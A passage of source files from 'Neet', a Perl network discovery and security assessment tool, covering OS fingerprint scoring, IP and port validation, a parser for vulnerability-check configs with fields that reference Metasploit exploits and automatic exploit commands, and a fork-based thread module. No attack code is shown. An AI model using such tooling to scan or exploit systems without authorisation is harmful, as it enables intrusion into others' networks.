$version=$ve; 94 | $verconf=$vc; 95 | $c=$vc; 96 | } 97 | } 98 | } 99 | 100 | # Work out the service pack next 101 | if ($version){ 102 | $c=0; 103 | for my $sig (@{$$self{'Sigs'}}){ 104 | next if ($sig !~ /^$service\*/); 105 | my ($s,$b,$ty,$fa,$fc,$ve,$vc,$sp,$sc)=split ("\\*", $sig); 106 | next if ("$fa" ne "$family") || ("$ve" ne "$version"); 107 | $b =~ s/\W//g; 108 | next if ($banner !~ /$b/); 109 | ($s,$b)=("",""); 110 | if ($sc && ($sc > $c)){ 111 | $servicepack=$sp; 112 | $spconf=$sc; 113 | $c=$sc; 114 | } 115 | } 116 | } 117 | 118 | return ($type,$family,$famconf,$version,$verconf,$servicepack,$spconf); 119 | } 120 | 121 | sub HashToOS { 122 | my $self=shift(); 123 | my $hash=shift(); 124 | my ($type,$family,$fconf,$version,$vconf,$servicepack,$sconf,%sort,@values); 125 | 126 | # Add up the scores and determine OS family first 127 | for (my $i=0; $i< $$hash{'index'}{'0'}; $i++){ 128 | my ($_type,$_family,$_fconf); 129 | $_type=$$hash{$i}{'type'}; $_family=$$hash{$i}{'family'}; $_fconf=$$hash{$i}{'fconf'}; 130 | #print "Type $_type Fam $_family Confidence $_fconf\n"; 131 | if ($$sort{$_family}{'c'}){ 132 | $$sort{$_family}{'c'} += $_fconf; 133 | } else { 134 | $$sort{$_family}{'c'} = $_fconf; 135 | $$sort{$_family}{'t'} = $_type; 136 | push @values, $_family; 137 | } 138 | } 139 | #print "Sorting Family\n"; 140 | my $c=0; 141 | for my $fam (@values){ 142 | #print "$fam (" . $$sort{$fam}{'t'} . ") " . $$sort{$fam}{'c'} . "\n"; 143 | if ($$sort{$fam}{'c'} > $c){ 144 | $family=$fam; 145 | $type=$$sort{$fam}{'t'}; 146 | $fconf=$$sort{$fam}{'c'}; 147 | $c=$$sort{$fam}{'c'}; 148 | } 149 | } 150 | 151 | return undef if (!$family); 152 | #print "Chosen $family\n"; 153 | 154 | # Now choose the version 155 | $#values=-1; %sort=(); 156 | for (my $i=0; $i< $$hash{'index'}{'0'}; $i++){ 157 | my ($_family,$_version,$_vconf); 158 | $_family=$$hash{$i}{'family'}; $_version=$$hash{$i}{'version'}; $_vconf=$$hash{$i}{'vconf'}; 159 | next if ((!$_version) || ("$_family" ne "$family")); 160 | #print "Fam $_family Ver $_version Confidence $_vconf\n"; 161 | if ($$sort{$_version}{'c'}){ 162 | $$sort{$_version}{'c'} += $_vconf; 163 | } else { 164 | $$sort{$_version}{'c'} = $_vconf; 165 | push @values, $_version; 166 | } 167 | } 168 | #print "Sorting Version\n"; 169 | $c=0; 170 | for my $ver (@values){ 171 | #print "$ver " . $$sort{$ver}{'c'} . "\n"; 172 | if ($$sort{$ver}{'c'} > $c){ 173 | $version=$ver; 174 | $vconf=$$sort{$ver}{'c'}; 175 | $c=$$sort{$ver}{'c'}; 176 | } 177 | } 178 | 179 | if ($version){ 180 | #print "Chosen $version\n"; 181 | # Now choose the service pack 182 | $#values=-1; %sort=(); 183 | for (my $i=0; $i< $$hash{'index'}{'0'}; $i++){ 184 | my ($_family,$_version,$_servicepack,$_sconf); 185 | $_family=$$hash{$i}{'family'}; $_version=$$hash{$i}{'version'}; $_servicepack=$$hash{$i}{'servicepack'}; $_sconf=$$hash{$i}{'sconf'}; 186 | next if ((!$_servicepack) || ("$_version" ne "$version") || ("$_family" ne "$family")); 187 | #print "Fam $_family Ver $_version ServicePack $_servicepack Confidence $_sconf\n"; 188 | if ($$sort{$_servicepack}{'c'}){ 189 | $$sort{$_servicepack}{'c'} += $_sconf; 190 | } else { 191 | $$sort{$_servicepack}{'c'} = $_sconf; 192 | push @values, $_servicepack; 193 | } 194 | } 195 | #print "Sorting ServicePack\n"; 196 | $c=0; 197 | for my $sp (@values){ 198 | #print "$sp " . $$sort{$sp}{'c'} . "\n"; 199 | if ($$sort{$sp}{'c'} > $c){ 200 | $servicepack=$sp; 201 | $sconf=$$sort{$sp}{'c'}; 202 | $c=$$sort{$sp}{'c'}; 203 | } 204 | } 205 | #print "Chosen $servicepack\n"; 206 | } 207 | return ($type,$family,$fconf,$version,$vconf,$servicepack,$sconf); 208 | } 209 | 210 | sub Unload { 211 | my $self=shift(); 212 | $#{$self{'Sigs'}}=-1; 213 | return undef; 214 | } 215 | 216 | 217 | 1; 218 | -------------------------------------------------------------------------------- /content/main/Neet/Util.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | # 19 | # Contact: jonnyhightower [at] funkygeek.com 20 | # 21 | ########################################################################## 22 | 23 | # Util.pm 24 | 25 | # Miscellaneous functions for Neet 26 | # Jonathan Roach 27 | # April 2006 28 | # Version 29 | 30 | # User input 31 | sub OLDGetKey { 32 | # Nasty hack to work with ubuntu (Jan 2007) 33 | my $key=`/bin/bash -c 'read -sn1 result 2>/dev/null && echo \$result'`; 34 | chomp $key; 35 | return $key; 36 | } 37 | 38 | sub GetKey { 39 | ReadMode 3; 40 | my $key = ReadKey 0; 41 | ReadMode 0; 42 | return $key; 43 | } 44 | 45 | sub GetLine { 46 | my $line; 47 | until ($line && $line =~ /\S/){ 48 | $line=; 49 | } 50 | return $line; 51 | } 52 | 53 | sub GetLineNWS { 54 | my $line=GetLine(); 55 | $line =~ s/\n//g; 56 | $line =~ s/\s/_/g; 57 | return $line; 58 | } 59 | 60 | sub PageSeparator { 61 | print "\n" . "-" x 80 . "\n" . "-" x 80 . "\n\n"; 62 | return 1; 63 | } 64 | 65 | sub Stamp { 66 | my $stamp=`date`; 67 | chomp $stamp; 68 | return $stamp; 69 | } 70 | 71 | sub Mid { 72 | my $line=shift(); 73 | $line =~ s/\n$//; 74 | my ($width,@junk)=GetTerminalSize(); 75 | $width=80 if (!$width); 76 | if (length($line)<($width-3)){ 77 | $line = " $line "; 78 | if (length($line) % 2 > 0){ 79 | $line .= " "; 80 | } 81 | my $padsize=($width-length($line))/2; 82 | $line = "-" x $padsize . $line . "-" x $padsize . "\n"; 83 | return $line; 84 | } else { 85 | return $line; 86 | } 87 | } 88 | 89 | 90 | #************************************************ 91 | # Port and Address specification validation 92 | #************************************************ 93 | sub IsPortSpec { 94 | my $spec=shift(); 95 | return 1 if ($spec =~ /^\d+[-,]??\d+$/); 96 | return 0; 97 | } 98 | 99 | sub IsIPSpec { 100 | my $spec=shift(); 101 | my $status=1; 102 | if (!defined($spec)){ 103 | return $status; 104 | } 105 | if ($spec !~ /\//){ 106 | # Absolute range 107 | my @octets=split "\\.", $spec; 108 | return 0 if ($#octets != 3); 109 | for my $octet (@octets){ 110 | my ($a,$b)=split("-",$octet); 111 | if ($b){ 112 | $status=0 if ($b !~ /^\d{1,3}$/); 113 | $status=0 if (($b > 255) || ($b <= $a)); 114 | } else { 115 | $status=0 if ($octet =~ /-/); 116 | } 117 | if ("$a" ne "*"){ 118 | $status=0 if ($a !~ /^\d{1,3}$/); 119 | $status=0 if ($status && (($a < 0) || ($a > 255))); 120 | } 121 | } 122 | } else { 123 | # CIDR notation 124 | my ($net,$mask)=split "/", $spec; 125 | $status=IsIPSpec($net); 126 | if ($status){ 127 | if (!IsIPSpec($mask)){ 128 | if (!(($mask =~ /^\d+$/) && ($mask > 0) && ($mask < 33))){ 129 | $status=0; 130 | } 131 | } 132 | } 133 | } 134 | return $status; 135 | } 136 | 137 | sub IsIPRange { 138 | my $range=shift(); 139 | if ($range =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\-\d{1,3}$/){ 140 | return 1; 141 | } else { 142 | return 0; 143 | } 144 | } 145 | 146 | # *************** 147 | # Toolkit Testing 148 | # *************** 149 | 150 | sub HaveTool { 151 | my $tool=shift(); 152 | return 0 if (!$tool || ($tool =~ /[&\|\*\<\>\(\)\!\s\?#]/)); 153 | my $r=system ("type $tool >/dev/null 2>&1"); 154 | $r=$r>>8; 155 | return 1 if (!$r); 156 | return 0; 157 | } 158 | 159 | sub ToolVersion { 160 | my $tool=shift(); 161 | return 0 if (!$tool || ($tool =~ /[&\|\*\<\>\(\)\!\s\?#]/)); 162 | my $versionflag=shift(); 163 | return 0 if (!$versionflag || ($versionflag =~ /[&\|\*\<\>\(\)\!\s\?#]/)); 164 | my $versionrx=shift(); 165 | $versionrx="\\d{1,}\\.\\d{1,}[\\.\\d{1,}]??" if (!$versionrx); 166 | my @v=`$tool $versionflag 2>&1`; 167 | my $version; 168 | for my $l (@v){ 169 | next if (!$l || ($l !~ /\S/)); 170 | if ($l =~ /$versionrx/){ 171 | $version=$l; 172 | $version =~ s/[\s\S]+($versionrx)[\s\S]+/$1/g;; 173 | return $version; 174 | } 175 | } 176 | return 0; 177 | } 178 | 179 | sub ToolCheck { 180 | my $tool=shift(); 181 | return 0 if (!$tool || ($tool =~ /[&\|\*\<\>\(\)\!\s\?#]/)); 182 | if (HaveTool($tool)){ 183 | my $version = ToolVersion($tool,'-V'); 184 | print "Got $tool version $version\n"; 185 | } else { 186 | print "$tool not installed or not in \$PATH\n"; 187 | } 188 | } 189 | 190 | # ****************** 191 | # Neet Plugin XML file parsing 192 | # ****************** 193 | 194 | package NeetXML; 195 | 196 | use XML::Parser; 197 | 198 | sub new { 199 | my $PKG=shift(); 200 | my $file=shift(); 201 | my %XML=(); 202 | # Parse the XML plugins data file 203 | no warnings; 204 | my %tmp=(); 205 | my %batch=(); 206 | 207 | sub _xml_start { 208 | my( $expat, $element, %attrs ) = @_; 209 | if(("$element" eq "plugin") && %attrs ) { 210 | %tmp=%attrs; 211 | } 212 | if(("$element" eq "batch") && %attrs ) { 213 | %batch=%attrs; 214 | } 215 | } 216 | 217 | sub _xml_char { 218 | my( $expat, $data ) = @_; 219 | if ($data =~ /\S/){ 220 | $XML{"$data"}{'desc'}=$tmp{'desc'} if ($tmp{'desc'}); 221 | $XML{"$data"}{'msref'}=$tmp{'msref'} if ($tmp{'msref'}); 222 | $XML{"$data"}{'cve'}=$tmp{'cve'} if ($tmp{'cve'}); 223 | $XML{"$data"}{'bid'}=$tmp{'bid'} if ($tmp{'bid'}); 224 | $XML{"$data"}{'type'}=$tmp{'type'} if ($tmp{'type'}); 225 | $XML{"$data"}{'msf_exploit'}=$tmp{'msf_exploit'} if ($tmp{'msf_exploit'}); 226 | $XML{"$data"}{'enabled'}=$tmp{'enabled'} if ($tmp{'enabled'}); 227 | $XML{"$data"}{'data'}=$tmp{'data'} if ($tmp{'data'}); 228 | $XML{"$data"}{'safe'}=$tmp{'safe'} if ($tmp{'safe'}); 229 | } 230 | } 231 | 232 | my $parser = XML::Parser->new( 'Handlers' => 233 | { 234 | 'Start'=>\&_xml_start, 235 | 'Char'=>\&_xml_char, 236 | }); 237 | 238 | $parser->parsefile("$file"); 239 | 240 | my $xmlobj=\%XML; 241 | bless $xmlobj, $PKG; 242 | return $xmlobj; 243 | } 244 | 245 | sub plugins { 246 | my $self=shift(); 247 | my @plugins; 248 | for my $plugin (keys(%{$self})){ 249 | push @plugins, $plugin if ("$plugin" ne "batch"); 250 | } 251 | return @plugins; 252 | } 253 | 254 | sub batch { 255 | my $self=shift(); 256 | return $$self{'batch'}{'data'}; 257 | } 258 | 259 | sub desc { 260 | my $self=shift(); 261 | my $plugin=shift(); 262 | return $$self{"$plugin"}{'desc'}; 263 | } 264 | 265 | sub type { 266 | my $self=shift(); 267 | my $plugin=shift(); 268 | return $$self{"$plugin"}{'type'}; 269 | } 270 | sub msref { 271 | my $self=shift(); 272 | my $plugin=shift(); 273 | return $$self{"$plugin"}{'msref'}; 274 | } 275 | sub cve { 276 | my $self=shift(); 277 | my $plugin=shift(); 278 | return $$self{"$plugin"}{'cve'}; 279 | } 280 | sub bid { 281 | my $self=shift(); 282 | my $plugin=shift(); 283 | return $$self{"$plugin"}{'bid'}; 284 | } 285 | sub msf_exploit { 286 | my $self=shift(); 287 | my $plugin=shift(); 288 | return $$self{"$plugin"}{'msf_exploit'}; 289 | } 290 | sub isSafe { 291 | my $self=shift(); 292 | my $plugin=shift(); 293 | return $$self{"$plugin"}{'safe'}; 294 | } 295 | sub enabled { 296 | my $self=shift(); 297 | my $plugin=shift(); 298 | return $$self{"$plugin"}{'enabled'}; 299 | } 300 | 301 | 1; 302 | -------------------------------------------------------------------------------- /content/main/Neet/VceConfig.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | # 19 | # Contact: jonnyhightower [at] funkygeek.com 20 | # 21 | ########################################################################## 22 | 23 | package Neet::VceConfig; 24 | 25 | sub new { 26 | my $pkg=shift(); 27 | my $file=shift(); 28 | my %data; 29 | my %section; 30 | my $self=\%data; 31 | my $id=0; 32 | if (open(VE,$file)){ 33 | 34 | until (eof VE){ 35 | my $line=readline(*VE); 36 | next if ($line !~ /^[\w\[]/); 37 | if ($line =~ /^\[CHECK\]/){ 38 | addConf(); 39 | next; 40 | } 41 | chomp $line; 42 | my ($key,$value)=split (" ", $line ,2); 43 | $section{$key}=$value; 44 | } 45 | close VE; 46 | addConf(); 47 | } else { 48 | return undef; 49 | } 50 | 51 | sub addConf { 52 | no warnings; 53 | if ($section{'name'}){ 54 | for my $key (keys(%section)){ 55 | $data{$id}{$key}=$section{$key}; 56 | } 57 | $id++; 58 | $data{'total'}=$id; 59 | } 60 | %section=(); 61 | } 62 | bless $self, $pkg; 63 | return $self; 64 | } 65 | 66 | sub totalChecks { 67 | my $self=shift(); 68 | return $$self{'total'}; 69 | } 70 | 71 | sub AllChecks { 72 | my $self=shift(); 73 | my $type=shift(); 74 | my @keys; 75 | for (my $id=0; $id < $$self{'total'}; $id++){ 76 | if ($type){ 77 | my $t=$self->Type($id); 78 | next if ("$t" ne "$type"); 79 | } 80 | push @keys, $id; 81 | } 82 | return @keys; 83 | } 84 | 85 | sub Checks { 86 | my $self=shift(); 87 | my $type=shift(); 88 | my @keys; 89 | for (my $id=0; $id < $$self{'total'}; $id++){ 90 | next if (! $self->Enabled($id)); 91 | if ($type){ 92 | my $t=$self->Type($id); 93 | next if ("$t" ne "$type"); 94 | } 95 | push @keys, $id; 96 | } 97 | return @keys; 98 | } 99 | 100 | sub Type { 101 | my $self=shift(); 102 | my $id=shift(); 103 | return $$self{$id}{'type'}; 104 | } 105 | sub Name { 106 | my $self=shift(); 107 | my $id=shift(); 108 | return $$self{$id}{'name'}; 109 | } 110 | sub Label { 111 | my $self=shift(); 112 | my $id=shift(); 113 | return $$self{$id}{'label'}; 114 | } 115 | sub Desc { 116 | my $self=shift(); 117 | my $id=shift(); 118 | return $$self{$id}{'desc'}; 119 | } 120 | sub Xterm { 121 | my $self=shift(); 122 | my $id=shift(); 123 | return $$self{$id}{'xterm'}; 124 | } 125 | sub Udpport { 126 | my $self=shift(); 127 | my $id=shift(); 128 | return $$self{$id}{'udpport'}; 129 | } 130 | sub Tcpport { 131 | my $self=shift(); 132 | my $id=shift(); 133 | return $$self{$id}{'tcpport'}; 134 | } 135 | sub Enabled { 136 | my $self=shift(); 137 | my $id=shift(); 138 | if ($$self{$id}{'enabled'} == "1"){ 139 | return 1; 140 | } 141 | return 0; 142 | } 143 | 144 | sub Msref { 145 | my $self=shift(); 146 | my $id=shift(); 147 | return $$self{$id}{'msref'}; 148 | } 149 | sub Cve { 150 | my $self=shift(); 151 | my $id=shift(); 152 | return $$self{$id}{'cve'}; 153 | } 154 | sub Bid { 155 | my $self=shift(); 156 | my $id=shift(); 157 | return $$self{$id}{'bid'}; 158 | } 159 | sub Check { 160 | my $self=shift(); 161 | my $id=shift(); 162 | return $$self{$id}{'check'}; 163 | } 164 | sub Vuln { 165 | my $self=shift(); 166 | my $id=shift(); 167 | return $$self{$id}{'vuln'}; 168 | } 169 | sub Exarch { 170 | my $self=shift(); 171 | my $id=shift(); 172 | return $$self{$id}{'exarch'}; 173 | } 174 | sub Extype { 175 | my $self=shift(); 176 | my $id=shift(); 177 | my $a= $$self{$id}{'extype'}; 178 | if ($a){ 179 | return $a; 180 | } 181 | return 0; 182 | 183 | } 184 | sub Exmancmd { 185 | my $self=shift(); 186 | my $id=shift(); 187 | return $$self{$id}{'exmancmd'}; 188 | } 189 | sub Exautocmd { 190 | my $self=shift(); 191 | my $id=shift(); 192 | return $$self{$id}{'exautocmd'}; 193 | } 194 | 195 | sub Exautosafe { 196 | my $self=shift(); 197 | my $id=shift(); 198 | return $$self{$id}{'exautosafe'}; 199 | } 200 | sub Credentialtype { 201 | my $self=shift(); 202 | my $id=shift(); 203 | return $$self{$id}{'credentialtype'}; 204 | } 205 | sub NoTest { 206 | my $self=shift(); 207 | my $id=shift(); 208 | return $$self{$id}{'notest'}; 209 | } 210 | 211 | sub Exmanusafe { 212 | my $self=shift(); 213 | my $id=shift(); 214 | return $$self{$id}{'exmanusafe'}; 215 | } 216 | 217 | sub GetVal { 218 | my $self=shift(); 219 | my $id=shift(); 220 | my $key=shift(); 221 | return $$self{$id}{$key}; 222 | } 223 | 224 | 1; 225 | -------------------------------------------------------------------------------- /content/main/Neet/threads.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | # 19 | # Contact: jonnyhightower [at] funkygeek.com 20 | # 21 | ########################################################################## 22 | 23 | package Neet::threads; 24 | use Storable; 25 | use POSIX ":sys_wait_h"; 26 | 27 | $SIG{'CHLD'}='Neet::threads::reaper'; 28 | 29 | my %threads; 30 | 31 | sub create { 32 | Neet::threads->_check(); 33 | my $obj=shift(@_); 34 | my $callback=shift(@_); 35 | my @params=@_; 36 | my $pid=fork(); 37 | 38 | if ($pid){ 39 | $Neet::threads::threads{'currentid'}++; 40 | $Neet::threads::threads{'pids'}{$Neet::threads::threads{'currentid'}}=$pid; 41 | $Neet::threads::threads{'tids'}{$pid}=$Neet::threads::threads{'currentid'}; 42 | 43 | my %thread; $thread{'id'}=$Neet::threads::threads{'currentid'}; 44 | $thread{'pid'}=$pid; $thread{'function'}=$callback; @{$thread{'parameters'}}=@params; 45 | $thread{'type'}='thread'; $thread{'storage'}="$Neet::threads::threads{'storage'}/$pid"; 46 | my $threadObject=\%thread; 47 | bless $threadObject, $obj; 48 | push @{$Neet::threads::threads{'threads'}}, $threadObject; 49 | return $threadObject; 50 | 51 | } else { 52 | 53 | $Neet::threads::threads{'currentid'}++; 54 | $Neet::threads::threads{'pids'}{$Neet::threads::threads{'currentid'}}=$pid; 55 | my $storage="$Neet::threads::threads{'storage'}/$$"; 56 | 57 | # Allow the thread to call "self" and access its own object 58 | my %thread; $thread{'id'}=$Neet::threads::threads{'currentid'}; 59 | $thread{'pid'}=$$; $thread{'function'}=$callback; @{$thread{'parameters'}}=@params; 60 | $thread{'type'}='thread'; my $threadObject=\%thread; $thread{'storage'}=$storage; 61 | bless $threadObject, $obj; 62 | push @{$Neet::threads::threads{'threads'}}, $threadObject; 63 | 64 | my @results=&{"main::$callback"}; 65 | if (@results){ 66 | mkdir $storage; 67 | close A if (open (A,">$storage/out")); 68 | chmod oct('700'), "$storage/out"; 69 | store \@results, "$storage/out"; 70 | } 71 | exit 0; 72 | } 73 | } 74 | 75 | sub reaper { 76 | my $child=1; 77 | do { 78 | $child= waitpid(-1, WNOHANG); 79 | } while $child>0; 80 | } 81 | 82 | sub join { 83 | my $self=shift(); 84 | return undef if (!defined($self)); 85 | my @return; 86 | if (exists($$self{'type'})){ 87 | if (!$self->is_running){ 88 | my $tid=$self->tid; 89 | my $pid=$self->pid; 90 | $Neet::threads::threads{'pids'}{$tid}=undef; 91 | ${$Neet::threads::threads{'threads'}}[$tid]=undef; 92 | # Read back return values; 93 | my $storage="$Neet::threads::threads{'storage'}/$pid"; 94 | if (-f "$storage/out"){ 95 | my $ref=retrieve "$storage/out"; 96 | unlink "$storage/out"; 97 | rmdir "$storage"; 98 | @return = @{$ref}; 99 | } 100 | } 101 | } 102 | return @return; 103 | } 104 | 105 | sub pid { 106 | my $self=shift(); 107 | if (exists($$self{'pid'})){ 108 | return $$self{'pid'}; 109 | } 110 | return $$; 111 | } 112 | 113 | sub tid { 114 | my $self=shift(); 115 | if (exists($$self{'id'})){ 116 | return $$self{'id'}; 117 | } 118 | return 0 if ($$ eq $Neet::threads::threads{'pids'}{0}); 119 | return $Neet::threads::threads{'currentid'}; 120 | } 121 | 122 | sub self { 123 | my $tid=$Neet::threads::threads{'currentid'}; 124 | return undef if ($$ eq $Neet::threads::threads{'pids'}{0}); 125 | my $self=@{$Neet::threads::threads{'threads'}}[$tid]; 126 | return $self; 127 | } 128 | 129 | sub callback { 130 | my $self=shift(); 131 | return undef if (!defined($self)); 132 | if (exists($$self{'callback'})){ 133 | return $$self{'callback'}; 134 | } 135 | return undef; 136 | } 137 | 138 | sub parameters { 139 | my $self=shift(); 140 | return undef if (!defined($self)); 141 | if (exists($$self{'id'})){ 142 | return @{$$self{'parameters'}}; 143 | } 144 | return undef; 145 | } 146 | 147 | sub is_running { 148 | my $self=shift(); 149 | return 0 if (!defined($self)); 150 | if (exists($$self{'pid'})){ 151 | my $dir="/proc/$$self{'pid'}"; 152 | if (-d $dir){ 153 | return 1; 154 | } 155 | } 156 | return 0; 157 | } 158 | 159 | sub kill { 160 | Neet::threads->_check(); 161 | my $self=shift(); 162 | if (exists($$self{'id'})){ 163 | my $signal=shift(); 164 | return kill ($signal, $$self{'pid'}); 165 | } 166 | return undef; 167 | } 168 | 169 | sub object { 170 | my $tid=shift(); 171 | # Prevent threads calling other threads as this information may not be available 172 | return undef if ($$ != $Neet::threads::threads{'pids'}{0}); 173 | return ${$Neet::threads::threads{'threads'}}[$tid]; 174 | } 175 | 176 | sub is_joinable { 177 | my $self=shift(); 178 | return 1 if (!$self->is_running); 179 | return 0; 180 | } 181 | 182 | sub running { 183 | Neet::threads->_check(); 184 | my @running; 185 | for my $i (1..$Neet::threads::threads{'currentid'}){ 186 | if (defined(${$Neet::threads::threads{'threads'}}[$i]) && ${$Neet::threads::threads{'threads'}}[$i]->is_running){ 187 | push @running, ${$Neet::threads::threads{'threads'}}[$i]; 188 | } 189 | } 190 | return @running; 191 | } 192 | 193 | sub joinable { 194 | my @joinable; 195 | for my $i (1..$Neet::threads::threads{'currentid'}){ 196 | if (defined(${$Neet::threads::threads{'threads'}}[$i]) && !${$Neet::threads::threads{'threads'}}[$i]->is_running){ 197 | push @joinable, ${$Neet::threads::threads{'threads'}}[$i]; 198 | } 199 | } 200 | return @joinable; 201 | } 202 | 203 | sub all { 204 | my @all; 205 | for my $i (1..$Neet::threads::threads{'currentid'}){ 206 | if (defined(${$Neet::threads::threads{'threads'}}[$i])){ 207 | push @all, ${$Neet::threads::threads{'threads'}}[$i]; 208 | } 209 | } 210 | return @all; 211 | } 212 | 213 | sub equal { 214 | my $thr1=shift(); 215 | my $thr2=shift(); 216 | if (exists($$thr1{'pid'}) && exists($$thr2{'pid'})){ 217 | if ($$thr1{'pid'} == $$thr2{'pid'}){ 218 | return 1; 219 | } 220 | } 221 | return 0; 222 | } 223 | 224 | sub list { 225 | Neet::threads->_check(); 226 | my $cmd=shift(); 227 | if (!defined($cmd)){ 228 | return all(); 229 | } elsif ($cmd eq "running"){ 230 | return running(); 231 | } elsif ($cmd eq "joinable"){ 232 | return joinable(); 233 | } 234 | return undef; 235 | } 236 | 237 | 238 | sub _check { 239 | my $obj=shift(); 240 | if (!exists($Neet::threads::threads{'currentid'})){ 241 | $Neet::threads::threads{'pids'}{0}=$$; 242 | $Neet::threads::threads{'currentid'}=0; 243 | 244 | my %thread; $thread{'id'}=0; 245 | $thread{'pid'}=$$; 246 | my $threadObject=\%thread; 247 | bless $threadObject, $obj; 248 | push @{$Neet::threads::threads{'threads'}}, $threadObject; 249 | 250 | my $user=$ENV{'USER'}; 251 | if (!defined($user)){ 252 | $user=`/usr/bin/id -un`; 253 | } 254 | $Neet::threads::threads{'storage'}="/tmp/Neet::threads-${user}/"; 255 | if (! -d "$Neet::threads::threads{'storage'}"){ 256 | mkdir "$Neet::threads::threads{'storage'}"; 257 | chmod oct('700'), "$Neet::threads::threads{'storage'}"; 258 | 259 | } 260 | $Neet::threads::threads{'storage'}="/tmp/Neet::threads-${user}/$$"; 261 | if (! -d "$Neet::threads::threads{'storage'}"){ 262 | mkdir "$Neet::threads::threads{'storage'}"; 263 | chmod oct('700'), "$Neet::threads::threads{'storage'}"; 264 | } 265 | } 266 | } 267 | 268 | sub exit { 269 | my $obj=shift(); 270 | my $code=shift(); 271 | $code=0 if (!$code); 272 | exit $code; 273 | } 274 | 275 | 1; 276 | 277 | -------------------------------------------------------------------------------- /content/main/bin/aliases.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | ########################################################################## 4 | # 5 | # Neet: Network discovery, enumeration and security assessment tool 6 | # Copyright (C) 2008-2016 Jonathan Roach 7 | # 8 | # This program is free software: you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation, either version 3 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program. If not, see . 20 | # 21 | # Contact: jonnyhightower [at] funkygeek.com 22 | # 23 | ########################################################################## 24 | 25 | #use strict; 26 | 27 | my $file; 28 | if (defined($ARGV[0]) && -f ("$ARGV[0]")){ 29 | $file="$ARGV[0]"; 30 | } 31 | 32 | exit 1 if (!defined($file)); 33 | 34 | my $FH; 35 | if (open($FH,"$file")){ 36 | my @live=<$FH>; 37 | close $FH; 38 | my $common=0; 39 | for (my $o=1; $o<4; $o++){ 40 | if (_common(\@live,$o)){ 41 | $common=$o; 42 | } else { 43 | last; 44 | } 45 | } 46 | #print "Found that $common octets were common\n"; 47 | # Create the aliases 48 | # No point creating them if there's no commonality. 49 | exit 0 if ($common == 0); 50 | for my $element (@live){ 51 | next if (length($element)<7); 52 | next if ($element !~/^\d{1,3}\./); 53 | my @octets=split ("\\.", $element); 54 | for (my $a=0; $a<$common; $a++){ 55 | shift (@octets); 56 | } 57 | my $alias=join ".", @octets; 58 | chomp $alias; 59 | $alias .= "~$element"; 60 | print $alias; 61 | } 62 | } 63 | 64 | sub _common { 65 | my $array=shift(); 66 | my $oct=shift(); 67 | my $sample=undef; 68 | my $common=1; 69 | for my $element (@{$array}){ 70 | next if (length($element)<7); 71 | exit 1 if ($element !~/^\d{1,3}\./); 72 | my @octets=split "\\.", $element; 73 | $sample=$octets[$oct-1] if (!defined($sample)); 74 | if ($octets[$oct-1] != $sample){ 75 | $common=0; 76 | last; 77 | } 78 | } 79 | return $common; 80 | } 81 | 82 | -------------------------------------------------------------------------------- /content/main/bin/allTcpPorts: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | ########################################################################## 4 | # 5 | # Neet: Network discovery, enumeration and security assessment tool 6 | # Copyright (C) 2008-2016 Jonathan Roach 7 | # 8 | # This program is free software: you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation, either version 3 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program. If not, see . 20 | # 21 | # Contact: jonnyhightower [at] funkygeek.com 22 | # 23 | ########################################################################## 24 | 25 | use strict; 26 | use File::Find; 27 | my (@_ports,%lookup); 28 | my $high=0; 29 | 30 | find(\&handleFile, "."); 31 | 32 | for my $port (@_ports){ 33 | if (!exists($lookup{$port})){ 34 | $lookup{$port} = 1; 35 | if ($port > $high){ 36 | $high=$port; 37 | } 38 | } 39 | } 40 | 41 | for (my $port=0;$port<=$high;$port++){ 42 | if (exists($lookup{$port})){ 43 | print $port; 44 | if ($port != $high){ 45 | print 